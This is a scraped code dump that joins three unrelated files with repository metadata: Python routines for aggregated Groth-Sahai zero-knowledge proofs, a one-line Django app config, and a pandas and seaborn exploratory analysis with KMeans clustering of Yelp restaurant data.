from hashlib import sha256
def proof_sigi(gsp, X, Y, M):
"""" creates GS proof that a USPS signature verifies
with the verifying key, the signature and the first message secret"""
res = []
A = []
B = []
C = []
counter_i = len(X)-len(M)-2
counter_j = len(Y)-len(M)-2
for i in range(len(X)):
row = []
for j in range(len(Y)):
var = Bn(0)
if i == counter_i and j == counter_j:
var = Bn(1)
counter_i += 1
counter_j += 1
row.append(var)
C.append(row)
success, result = gsp.Prove_aggreg("PPE", X, B, A, Y, C, GTElem.zero(gsp.G))
verify = 0
if success:
eq_type, X, Y, C, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result
#verify = gsp.Verify(eq_type, X, Y, C, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify:
res = [C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
#print("Do we successfully create a proof?", success)
#print("Does the proof successfully verify?", verify)
b = challenge(result)
for i in range(len(res[0])):
for j in range(len(res[0][0])):
if res[0][i][j] != 0:
res[0][i][j]= b*res[0][i][j]
for i in range(len(res[1])):
for j in range(len(res[1][i])):
res[1][i][j] = b*res[1][i][j]
#verify = gsp.Verify("PPE", X, Y, res[0], res[1][0], res[1][1], res[1][2], res[1][3])
#print("Does the (aggregate) proof verify?", verify)
return res
def proof_sigi0(gsp, X, Y, M1, M2, t):
""" create GS proof that sig verifies with the signature and all but the first message secret """
res = []
#print("----- first equation")
#res1 = e(R,V) * e(S,g2)* e(g1,Z)^-1 * Sum[] e(m1[i],W[i]) ]
res1=[]
B1 = []
A1 = []
C1 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C1.append(row)
C1[0][1] = Bn(-1) # e(g1,Z)^-1
C1[2+len(M2)][2] = Bn(1) # e(R,V)
C1[3+len(M2)][0] = Bn(1) # e(S,g2)
C1[0][3] = t # e(g1^t,W0)
C1[1+len(M2)][4] = Bn(1) # e(h_i,W1)
success1, result1 = gsp.Prove_aggreg("PPE", X, B1, A1, Y, C1, GTElem.zero(gsp.G))
verify1 = 0
if success1:
eq_type, X1, Y1, C1, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result1
#verify1 = gsp.Verify(eq_type, X1, Y1, C1, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify1:
res1 = [C1, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res1)
#print("Do we successfully create a first proof?", success1)
#print("Does the first proof successfully verify?", verify1)
#print("----- second equation")
#res2 = e(R,T) * e(g1,g2)^-1 * Sum [e(U[j],m2[j])]
res2=[]
B2 = []
A2 = []
C2 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C2.append(row)
C2[0][0] = Bn(-1) # e(g1,g2)^-1
C2[2+len(M2)][5] = Bn(1) # e(R,T)
for i in range(len(M2)):
C2[1+i][len(Y)-len(M2)+i] = Bn(1) # e(U, M2)
success2, result2 = gsp.Prove_aggreg("PPE", X, B2, A2, Y, C2, GTElem.zero(gsp.G))
verify2 = 0
if success2:
eq_type, X2, Y2, C2, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result2
#verify2 = gsp.Verify(eq_type, X2, Y2, C2, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify2:
res2 = [C2, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res2)
#print("Do we successfully create a second proof?", success2)
#print("Does the second proof successfully verify?", verify2)
#print("Are all the proofs successfull created?", success1*success2)
#print("Do all the proofs verify?", verify1*verify2)
b1 = challenge(result1)
b2 = challenge(result2)
C = []
for i in range(len(C1)):
row = []
for j in range(len(C1[0])):
cij = Bn(0)
if C1[i][j] != 0:
cij += b1 * C1[i][j]
if C2[i][j] != 0:
cij += b2 * C2[i][j]
row.append(cij)
C.append(row)
pi = []
for i in range(len(res1[1])):
pi_i = []
for j in range(len(res1[1][0])):
pi_ij = b1*res1[1][i][j] + b2*res2[1][i][j]
pi_i.append(pi_ij)
pi.append(pi_i)
#verify = gsp.Verify("PPE", X, Y, C, pi[0], pi[1], pi[2], pi[3])
#print("Does the (aggregate) proof verify?", verify)
return C, pi, res
def proof_sigit(gsp, X, Y, M1, M2, t):
""" create GS proof that sig verifies with the signature and all but the first message secret """
res = []
#print("----- first equation")
#res1 = e(R,V) * e(S,g2)* e(g1,Z)^-1 * Sum[] e(m1[i],W[i]) ]
res1 = []
B1 = []
A1 = []
C1 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C1.append(row)
C1[0][1] = Bn(-1) # e(g1,Z)^-1
C1[4+len(M2)][2] = Bn(1) # e(R,V)
C1[5+len(M2)][0] = Bn(1) # e(S,g2)
C1[0][3] = t # e(g1^t,W0)
C1[1+len(M2)][4] = Bn(1) # e(h_i,W1)
success1, result1 = gsp.Prove_aggreg("PPE", X, B1, A1, Y, C1, GTElem.zero(gsp.G))
verify1 = 0
if success1:
eq_type, X1, Y1, C1, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result1
#verify1 = gsp.Verify(eq_type, X1, Y1, C1, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify1:
res1 = [C1, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res1)
#print("Do we successfully create a first proof?", success1)
#print("Does the first proof successfully verify?", verify1)
#print("----- second equation")
#res2 = e(R,T) * e(g1,g2)^-1 * Sum [e(U[j],m2[j])]
res2 = []
B2 = []
A2 = []
C2 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
c = Bn(0)
row.append(c)
C2.append(row)
C2[0][0] = Bn(-1) # e(g1,g2)^-1
C2[4+len(M2)][6] = Bn(1) # e(R,T)
for i in range(len(M2)):
C2[1+i][len(Y)-len(M2)+i] = Bn(1) # e(U, M2)
success2, result2 = gsp.Prove_aggreg("PPE", X, B2, A2, Y, C2, GTElem.zero(gsp.G))
verify2 = 0
if success2:
eq_type, X2, Y2, C2, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result2
#verify2 = gsp.Verify(eq_type, X2, Y2, C2, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify2:
res2 = [C2, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res2)
#print("Do we successfully create a second proof?", success2)
#print("Does the second proof successfully verify?", verify2)
#print("Are all the proofs successfull created?", success1*success2)
#print("Do all the proofs verify?", verify1*verify2)
b1 = challenge(result1)
b2 = challenge(result2)
C = []
for i in range(len(C1)):
row = []
for j in range(len(C1[0])):
cij = Bn(0)
if C1[i][j] != 0:
cij += b1*C1[i][j]
if C2[i][j] != 0:
cij += b2*C2[i][j]
row.append(cij)
C.append(row)
pi = []
for i in range(len(res1[1])):
pi_i = []
for j in range(len(res1[1][0])):
pi_ij = b1*res1[1][i][j] + b2*res2[1][i][j]
pi_i.append(pi_ij)
pi.append(pi_i)
#verify = gsp.Verify("PPE", X, Y, C, pi[0], pi[1], pi[2], pi[3])
#print("Does the (aggregate) proof verify?", verify)
return C, pi, res
def enc_proof(gsp, X, Y, a):
res = []
#print("--- first equation")
# e = h_i + h*r
res1 = []
A1 = []
B1 = []
C1 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C1.append(row)
C1[12][0] = Bn(-1) # - e
C1[7][0] = Bn(1) # + h_i
C1[4][2] = Bn(1) # + h*r
success1, result1 = gsp.Prove_aggreg("ME1", X, B1, A1, Y, C1, G1Elem.inf(gsp.G))
verify1 = 0
if success1:
eq_type, X1, Y1, C1, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result1
#verify1 = gsp.Verify(eq_type, X1, Y1, C1, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify1:
res1 = [C1, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res1)
#print("Do we successfully create a first proof?", success1)
#print("Does the first proof successfully verify?", verify1)
#print("--- second equation")
#u1 = g1_enc*r
res2 = []
B2 = []
A2 = []
C2 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C2.append(row)
C2[0][2] = Bn(-1) # - g1enc*r
C2[10][0] = Bn(1) # + u1
success2, result2 = gsp.Prove_aggreg("MC1", X, B2, A2, Y, C2, G1Elem.inf(gsp.G))
verify2 = 0
if success2:
eq_type, X2, Y2, C2, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result2
#verify2 = gsp.Verify(eq_type, X2, Y2, C2, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify2:
res2 = [C2, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res2)
#print("Do we successfully create a second proof?", success2)
#print("Does the second proof successfully verify?", verify2)
#print("--- third equation")
#u2 = g2_enc*r
res3 = []
B3 = []
A3 = []
C3 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C3.append(row)
C3[1][2] = Bn(-1) # - g2_enc * r
C3[11][0] = Bn(1) # + u2
success3, result3 = gsp.Prove_aggreg("ME1", X, B3, A3, Y, C3, G1Elem.inf(gsp.G))
verify3 = 0
if success3:
eq_type, X3, Y3, C3, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result3
#verify3 = gsp.Verify(eq_type, X3, Y3, C3, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify3:
res3 = [C3, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res3)
#print("Do we successfully create a third proof?", success3)
#print("Does the third proof successfully verify?", verify3)
""" We perform this check with a hash
#print("--- fourth equation")
# da = d*a
res4 = []
B4 = []
A4 = []
C4 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C4.append(row)
C4[9][0] = Bn(-1) # - da
C4[3][0] = a # + d*a
success4, result4 = gsp.Prove_aggreg("ME1", X, B4, A4, Y, C4, G1Elem.inf(gsp.G))
verify4 = 0
if success4:
eq_type, X4, Y4, C4, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result4
#verify4 = gsp.Verify(eq_type, X4, Y4, C4, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify4:
res4 = [C4, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
res.append(res4)
#print("Do we successfully create an fourth proof?", success4)
#print("Does the fourth proof successfully verify?", verify4)
"""
#print("--- fifth equation")
#v = c*r + d*(a*r) = c*r + da*r
res5 = []
B5 = []
A5 = []
C5 = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C5.append(row)
C5[2][2] = Bn(1) # + c*r
C5[9][2] = Bn(1) # + da*r
C5[13][0] = Bn(-1) # - v
success5, result5 = gsp.Prove_aggreg("MC1", X, B5, A5, Y, C5, G1Elem.inf(gsp.G))
verify5 = 0
if success5:
eq_type, X5, Y5, C5, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result5
#verify5 = gsp.Verify(eq_type, X5, Y5, C5, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify5:
res5 = [C5, [pi2_v1, pi2_w1, pi1_v2, pi1_w2]]
res.append(res5)
#print("Do we successfully create a fifth proof?", success5)
#print("Does the fifth proof successfully verify?", verify5)
#print("Do we successfully create all the proofs?", success1*success2*success3*success4*success5)
#print("Do all the proofs successfully verify?", verify1*verify2*verify3*verify4*verify5)
b1 = challenge(result1)
b2 = challenge(result2)
b3 = challenge(result3)
#b4 = challenge(result4)
b5 = challenge(result5)
C = []
for i in range(len(C1)):
row = []
for j in range(len(C1[0])):
cij = Bn(0)
if C1[i][j] != 0:
cij += b1*C1[i][j]
if C2[i][j] != 0:
cij += b2*C2[i][j]
if C3[i][j] != 0:
cij += b3*C3[i][j]
#if C4[i][j] != 0:
# cij += b4*C4[i][j]
if C5[i][j] != 0:
cij += b5*C5[i][j]
row.append(cij)
C.append(row)
pi = []
for i in range(len(res1[1])):
pi_i = []
for j in range(len(res1[1][0])):
pi_ij = b1*res1[1][i][j] + b2*res2[1][i][j] + b3*res3[1][i][j] + b5*res5[1][i][j] # + b4*res4[1][i][j]
pi_i.append(pi_ij)
pi.append(pi_i)
print("\n--- enc")
for i in range(len(res)):
print("proof #"+str(i))
for j in range(4):
for k in range(2):
if type(res[i][1][j][k]) == G1Elem:
print(i,j,k, type(res[i][1][j][k]), res[i][1][j][k].eq(G1Elem.inf(gsp.G)))
else:
print(i,j,k,type(res[i][1][j][k]), res[i][1][j][k].eq(G2Elem.inf(gsp.G)))
#verify = gsp.Verify("ME1", X, Y, C, pi[0], pi[1], pi[2], pi[3])
#print("Does the (aggregate) proof verify?", verify)
return C, pi, res
def proof_pkuv(gsp, X, Y):
res = []
B = []
A = []
C = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C.append(row)
C[6][0] = Bn(1) # pk_uv
C[5][1] = Bn(-1) # - h_v^sku
success, result = gsp.Prove_aggreg("MC1", X, B, A, Y, C, G1Elem.inf(gsp.G))
verify = 0
if success:
eq_type, X, Y, C, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result
#verify = gsp.Verify(eq_type, X, Y, C, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify:
res = [C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
#print("Do we successfully create a proof?", success)
#print("Does the proof successfully verify?", verify)
print("\n----pk uv")
for i in range(len(res[1])):
for j in range(2):
if type(res[1][i][j]) == G1Elem:
print(i,j,type(res[1][i][j]), res[1][i][j].eq(G1Elem.inf(gsp.G)))
else:
print(i,j,type(res[1][i][j]), res[1][i][j].eq(G2Elem.inf(gsp.G)))
b = challenge(result)
for i in range(len(res[0])):
for j in range(len(res[0][0])):
if res[0][i][j] != 0:
res[0][i][j]= b*res[0][i][j]
for i in range(len(res[1])):
for j in range(len(res[1][i])):
res[1][i][j] = b*res[1][i][j]
#verify = gsp.Verify("ME1", X, Y, C, res[1][0], res[1][1], res[1][2], res[1][3])
#print("Does the (aggregate) proof verify?", verify)
return res
def proof_pkui(gsp, X, Y):
res = []
B = []
A = []
C = []
for i in range(len(X)):
row = []
for j in range(len(Y)):
row.append(Bn(0))
C.append(row)
C[8][0] = Bn(1) # pk_ui
C[7][1] = Bn(-1) # - h_i^sku
success, result = gsp.Prove_aggreg("ME1", X, B, A, Y, C, G1Elem.inf(gsp.G))
verify = 0
if success:
eq_type, X, Y, C, T_eq, pi2_v1, pi2_w1, pi1_v2, pi1_w2 = result
#verify = gsp.Verify(eq_type, X, Y, C, pi2_v1, pi2_w1, pi1_v2, pi1_w2)
#if verify:
res = [C, [pi2_v1, pi2_w1, pi1_v2, pi1_w2] ]
#print("Do we successfully create a proof?", success)
#print("Does the proof successfully verify?", verify)
print("\n--- pkui")
for i in range(len(res[1])):
for j in range(2):
if type(res[1][i][j]) == G1Elem:
print(i,j,type(res[1][i][j]),res[1][i][j].eq(G1Elem.inf(gsp.G)))
else:
print(i,j,type(res[1][i][j]),res[1][i][j].eq(G2Elem.inf(gsp.G)))
b = challenge(result)
for i in range(len(res[0])):
for j in range(len(res[0][0])):
res[0][i][j]= b*res[0][i][j]
for i in range(len(res[1])):
for j in range(len(res[1][i])):
res[1][i][j] = b*res[1][i][j]
#verify = gsp.Verify("ME1", X, Y, res[0], res[1][0], res[1][1], res[1][2], res[1][3])
#print("Does the (aggregate) proof verify?", verify)
return res
def challenge(elements):
"""Packages a challenge in a bijective way"""
elem = [len(elements)] + elements
elem_str = map(str, elem)
elem_len = map(lambda x: "%s||%s" % (len(x) , x), elem_str)
state = "|".join(elem_len)
H = sha256()
H.update(state.encode("utf8"))
return Bn.from_binary(H.digest())
def prepare_proofs(auth, vkI, pki, pkv, m, sig_t, t, pk_ui, pk_uv, sku, cipher, ek, r):
#print("Prepare aggregated proofs")
#print("Prepare proof: Commit")
#import time
#t_start = time.time()
U, W, V, Z = vkI
cm_U= []
for i in range(len(U)):
cm_U.append(auth.GS.Commit({"group":1, "type":"pub", "value":U[i]}))
cm_W = []
for i in range(len(W)):
cm_W.append(auth.GS.Commit({"group":2, "type":"pub", "value":W[i]}))
cm_V = auth.GS.Commit({"group":2, "type":"pub", "value":V})
cm_Z = auth.GS.Commit({"group":2, "type":"pub", "value":Z})
cm_vkI = [cm_U, cm_W, cm_V, cm_Z]
h_i, vk_i, sig0_i = pki
cm_h_i = auth.GS.Commit({"group":1, "type":"com", "value":h_i})
cm_vk_i = []
for i in range(len(vk_i)):
cm_vk_i.append(auth.GS.Commit({"group":2, "type":"com", "value":vk_i[i]}))
cm_sig0_i = []
cm_sig0_i.append(auth.GS.Commit({"group":1, "type":"com", "value":sig0_i[0]}))
cm_sig0_i.append(auth.GS.Commit({"group":1, "type":"enc", "value":sig0_i[1]}))
cm_sig0_i.append(auth.GS.Commit({"group":2, "type":"enc", "value":sig0_i[2]}))
h_v, vk_v, sig0_v = pkv
cm_h_v = auth.GS.Commit({"group":1, "type":"pub", "value":h_v})
cm_m = []
for i in range(len(m)):
cm_m.append(auth.GS.Commit({"group":1, "type":"pub", "value":m[i]}))
for i in range(len(cm_vk_i) - 1 -2 - len(cm_m)):
cm_m.append(auth.GS.Commit({"group":1, "type":"pub", "value":G1Elem.inf(auth.GS.G)}))
sig_i, c_it = sig_t
cm_sig_i = []
for i in range(len(sig_i)):
cm_sig_i.append(auth.GS.Commit({"group":1, "type":"enc", "value":sig_i[i]}))
_, sigt_i = c_it
cm_sigt_i = []
cm_sigt_i.append(auth.GS.Commit({"group":1, "type":"com", "value":sigt_i[0]}))
cm_sigt_i.append(auth.GS.Commit({"group":1, "type":"enc", "value":sigt_i[1]}))
cm_sigt_i.append(auth.GS.Commit({"group":2, "type":"enc", "value":sigt_i[2]}))
#t: used as public scalar constraint (gamma_ij)
cm_pk_ui = auth.GS.Commit({"group":1, "type":"com", "value":pk_ui})
cm_pk_uv = auth.GS.Commit({"group":1, "type":"pub", "value":pk_uv})
cm_sku = auth.GS.Commit({"group":2, "type":"sca", "value":sku})
cm_cipher = []
for i in range(len(cipher)):
cm_cipher.append(auth.GS.Commit({"group":1, "type":"pub", "value":cipher[i]}))
cm_r = r
cm_r[0] = auth.GS.Commit({"group":2, "type":"sca", "value":r[0]})
cm_ek = []
for i in range(len(ek)):
cm_ek.append(auth.GS.Commit({"group":1, "type":"pub", "value":ek[i]}))
cm_da = auth.GS.Commit({"group":1, "type":"pub", "value":auth.ek[1]*r[1]})
cm_params_enc = []
cm_params_enc.append(auth.GS.Commit({"group":1, "type":"pub", "value":auth.GS.v1[0]}))
cm_params_enc.append(auth.GS.Commit({"group":1, "type":"pub", "value":auth.GS.v1[1]}))
cm_g1 = auth.GS.Commit({"group":1, "type":"bas", "value":auth.GS.g1})
cm_g2 = auth.GS.Commit({"group":2, "type":"bas", "value":auth.GS.g2})
cm_1 = auth.GS.Commit({"group":2, "type":"unt", "value":1})
#t_commit = time.time()
#print("--- Commitment time:", t_commit - t_start)
x_ppe = [cm_g1]
x_ppe.extend(cm_vkI[0])
x_ppe.append(cm_h_i)
x_ppe.extend([cm_sig0_i[0], cm_sig0_i[1]])
x_ppe.extend([cm_sigt_i[0], cm_sigt_i[1]])
x_ppe.extend(cm_sig_i)
x_ppe.append(cm_pk_ui)
x_ppe.extend(cm_m)
#print("\nx_ppe", len(x_ppe), x_ppe)
y_ppe = [cm_g2]
y_ppe.append(cm_vkI[3])
y_ppe.append(cm_vkI[2])
y_ppe.extend(cm_vkI[1])
y_ppe.append(cm_sig0_i[2])
y_ppe.append(cm_sigt_i[2])
y_ppe.extend(cm_vk_i)
#print("\ny_ppe", len(y_ppe), y_ppe)
x_me1 = []
x_me1.extend(cm_params_enc)
x_me1.extend(cm_ek)
x_me1.append(cm_h_v)
x_me1.append(cm_pk_uv)
x_me1.append(cm_h_i)
x_me1.append(cm_pk_ui)
x_me1.append(cm_da)
x_me1.extend(cm_cipher)
#print("\nx_me1", len(x_me1), x_me1)
y_me1 = [cm_1, cm_sku, cm_r[0]]
#print("\ny_me1", len(y_me1), y_me1)
#print("Prepare proof: Prove")
#t_prove = time.time()
#print("--- sigi proof")
cm_msg = [cm_pk_ui]
cm_msg.extend(cm_m)
for i in range(len(cm_vk_i) - 2 - len(cm_msg)):
cm_msg.append(auth.GS.Commit({"group":1, "type":"pub", "value":G1Elem.inf(auth.GS.G)}))
C_sigi, pi_sigi = proof_sigi(auth.GS, x_ppe, y_ppe, cm_msg)
cm_msg1 = [cm_g1, cm_h_i]
cm_msg2 = cm_vk_i
#print("--- sigi0 proof")
C_sigi0, pi_sigi0, _ = proof_sigi0(auth.GS, x_ppe, y_ppe, cm_msg1, cm_msg2, Bn(0))
#print("--- sigit proof")
C_sigit, pi_sigit, _ = proof_sigit(auth.GS, x_ppe, y_ppe, cm_msg1, cm_msg2, t)
#print("--- Aggregate PPE proofs")
c_ppe = []
for i in range(len(C_sigi)):
row = []
for j in range(len(C_sigi[i])):
cij = C_sigi[i][j] + C_sigit[i][j] + C_sigi0[i][j]
row.append(cij)
c_ppe.append(row)
pi_ppe = []
for i in range(len(pi_sigi)):
pi_i = []
for j in range(len(pi_sigi[i])):
pi_ij = pi_sigi[i][j] + pi_sigit[i][j] + pi_sigi0[i][j]
pi_i.append(pi_ij)
pi_ppe.append(pi_i)
#print("--- Randomize PPE proof")
pi_ppe[0], pi_ppe[1], pi_ppe[2], pi_ppe[3] = auth.GS.Randomize("PPE", pi_ppe[0], pi_ppe[1], pi_ppe[2], pi_ppe[3])
res_ppe = [c_ppe, pi_ppe]
#t_ppe = time.time()
print("--- exponent proofs pk_ui")
C_pkui, pi_pkui = proof_pkui(auth.GS, x_me1, y_me1)
print("--- exponent proofs pk_uv")
C_pkuv, pi_pkuv = proof_pkuv(auth.GS, x_me1, y_me1)
#print("--- enc proof")
C_enc, pi_enc, _ = enc_proof(auth.GS, x_me1, y_me1, r[1])
#print("--- aggregate ME1 proofs")
c_me1 = []
for i in range(len(C_enc)):
row = []
for j in range(len(C_enc[i])):
cij = C_enc[i][j] + C_pkui[i][j] + C_pkuv[i][j]
row.append(cij)
c_me1.append(row)
pi_me1 = []
for i in range(len(pi_enc)):
pi_i = []
for j in range(len(pi_enc[i])):
pi_ij = pi_enc[i][j] + pi_pkui[i][j] + pi_pkuv[i][j]
pi_i.append(pi_ij)
pi_me1.append(pi_i)
#print("------ Randomize ME1 proof")
pi_me1[0], pi_me1[1], pi_me1[2], pi_me1[3] = auth.GS.Randomize("PPE", pi_me1[0], pi_me1[1], pi_me1[2], pi_me1[3])
res_me1 = [c_me1, pi_me1]
#t_end = time.time()
#print("--- Prove & aggregation time:", t_end - t_commit, "(PPE proof: "+ str(t_ppe-t_commit) +"+ ME1 proof"+ str(t_end-t_ppe) +")")
verify_ppe = auth.GS.Verify(
"PPE",
x_ppe,
y_ppe,
c_ppe,
pi_ppe[0],
pi_ppe[1],
pi_ppe[2],
pi_ppe[3]
)
print("------ Aggregate PPE verify?", verify_ppe)
verify_me1 = auth.GS.Verify(
"ME1",
x_me1,
y_me1,
c_me1,
pi_me1[0],
pi_me1[1],
pi_me1[2],
pi_me1[3]
)
print("------ Aggregate ME1 verify?", verify_me1)
verify = verify_ppe*verify_me1
res = [
[res_ppe[1], ["PPE", x_ppe, y_ppe, res_ppe[0], GTElem.zero(auth.GS.G)]],
[res_me1[1], ["ME1", x_me1, y_me1, res_me1[0], G1Elem.inf(auth.GS.G)]]
]
#print("--- Do all the proofs verify?", verify_ppe*verify_me1)
return verify, res
| [
"noreply@github.com"
] | rrtoledo.noreply@github.com |
81df6b3c741f03920272dfa9dffe1c83c5fd169c | 729bf7c8bc3ee1f073cb390af6d47f653a8f66f3 | /Hackyeah/__init__.py | 022965f1807b20e11b2e62aa3f11d7057d5d24f8 | [] | no_license | danieljurczak/skarbnik-hackathon | 6f5c626a15299906a65b12dd585af8f95a90bb9b | 9157888d85c0d22ed57f861898318719998e9e43 | refs/heads/master | 2022-12-17T04:43:17.303233 | 2019-03-09T12:16:24 | 2019-03-09T12:16:24 | 158,933,513 | 0 | 2 | null | 2022-05-25T01:57:23 | 2018-11-24T12:19:34 | Python | UTF-8 | Python | false | false | 51 | py | default_app_config = 'skarbnik.apps.SkarbnikConfig' | [
"danieljur4@gmail.com"
] | danieljur4@gmail.com |
52b71bf750e768350bf69f21d94a78ff9ca35090 | 8a8463765239e923f00676ad26d7071275d0f462 | /project.py | ff8f9d28cfaea91911a54653d8b5efe2b66ac4a9 | [] | no_license | aparnamogallapu/yelp | e711821a756d8ddb1b8ab62ac3ef51035d672279 | c280ae4c757129f3498f851798cc3e1e6c8461b2 | refs/heads/master | 2020-06-29T07:02:15.809389 | 2019-08-04T08:48:10 | 2019-08-04T08:48:10 | 200,470,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,028 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 17 12:48:17 2019
@author: HP
"""
import pandas as pd
import numpy as no
import matplotlib.pyplot as plt
dataset=pd.read_csv("C:\\Users\\HP\\Desktop\\YELP BUSINESS\\yelp_business.csv")
data=dataset.copy()
dataset.info()
dataset.describe()
dataset.isna().sum()
neighborhood=dataset.neighborhood
dataset.drop(["neighborhood"],axis=1,inplace=True)
postal_code=dataset.postal_code
dataset.drop(["postal_code"],axis=1,inplace=True)
#df.drop(df.index[[1,3]], inplace=True)
dataset[dataset['city'].isnull()]
dataset.drop(dataset.index[146524],inplace=True)
dataset[dataset['state'].isnull()]
dataset.drop(dataset.index[52815],inplace=True)
dataset[dataset['latitude'].isnull()]
#dataset.drop(dataset.index[136097],inplace=True)
dataset[dataset['longitude'].isnull()]
#dataset.drop(dataset.index[136097],inplace=True)
#dataset.drop(dataset['city'].isna(),axis=0,inplace=True)
dataset.dropna(inplace=True)
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace('"',""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace(',',""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace("'",""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace('%',""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace('@',""))
#states
states=['AL','AK','AZ','AR','CA','CO','CT','DE','FL','GA','HI',
'ID','IL','IN','IA','KS','KY','LA','ME','MD','MA','MI',
'MN','MS','MO','MT','NE','NV','NH','NJ','NY','NM','NC',
'ND','OH','OK','OR','PA','RI','SC','SD','TN','TX','UT',
'VT','VA','WA','WV','WI','WY']
usa=dataset.loc[dataset['state'].isin(states)]
usa_restaurants = usa[usa['categories'].str.contains('Restaurants')]
usa_restaurants.categories.value_counts()
usa_restaurants.shape
#
usa_restaurants.is_copy=False
usa_restaurants['category']=pd.Series()
usa_restaurants.loc[usa_restaurants.categories.str.contains('American'),'category']='American'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Mexican'),'category']='Mexican'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Chinese'),'category']='Chinese'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Italian'),'category']='Italian'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Thai'),'category']='Thai'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Japanese'),'category']='Japanese'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Meditteranean'),'category']='Meditteranean'
usa_restaurants.loc[usa_restaurants.categories.str.contains('French'),'category']='French'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Vietnamese'),'category']='Vietnamese'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Greek'),'category']='Greek'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Indian'),'category']='Indian'
usa_restaurants.dropna(inplace=True)
usa_restaurants.columns
usa_restaurants.info()
#Eda
usa_restaurants.review_count.value_counts().sort_values(ascending=False)[0:50].plot.bar()
import seaborn as sns
sns.barplot(x='stars',y='category',data=usa_restaurants)
sns.countplot(x='stars',data=usa_restaurants,palette='viridis')
sns.distplot(usa_restaurants['review_count'])
sns.jointplot(x='review_count',y='category',data=usa_restaurants)
sns.barplot(x='category',y='stars',data=usa_restaurants)
sns.boxplot(x='state',y='stars',data=usa_restaurants)
sns.countplot(x='category',data=usa_restaurants)
plt.figure(figsize=(12,3))
sns.countplot(x='stars',data=usa_restaurants)
sns.barplot(x='latitude',y='category',data=usa_restaurants)
##pie chart
plt.axis('equal')
plt.pie(dataset.stars, labels='category',redius=1.5, shadow=True, explode=[0,0.1,0.1,0,0],
startangle=180,autopct='%0.1f%%')
plt.show()
'''fig, ax = plt.subplots(1, 1, figsize=(10,10))
news_data['stars'].value_counts().plot.pie( autopct = '%1.1f%%')'''
'''
#pip install cufflinks
#pip install plotly
import plotly .plotly as py
from plotly.offline import download_plotlyjs,init_notebook_mode,plot,iplot
import plotly.graph_objs as go
data=dict(type='choropleth',
locations=usa_restaurants['state'],
z=usa_restaurants['stars'],
text=['category'],
colorbar={'title':'starts in Restaurants'})
layout=dict(title='starts in Restaurants',
geo=dict(showframe=False,projection={'type':"stereographic"}))
choromap=go.Figure(data=[data],layout=layout)
iplot(choromap)'''
city=usa_restaurants.city
usa_restaurants.drop(["city"],axis=1,inplace=True)
state=usa_restaurants.state
usa_restaurants.drop(["state"],axis=1,inplace=True)
import os
os.chdir('F:\\ds')
usa_restaurants.to_csv('restaurants.csv',index = False)
usa_restaurants['ind']=usa_restaurants.index
usa_restaurants.info()
X=usa_restaurants.iloc[:,[8,7]].values
#elbow method:
from sklearn.cluster import KMeans
wcss=[]
for i in range(1,11):
kmeans=KMeans(n_clusters=i,init='k-means++',n_init=10,max_iter=300,random_state=0)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
plt.plot(range(1,11),wcss)
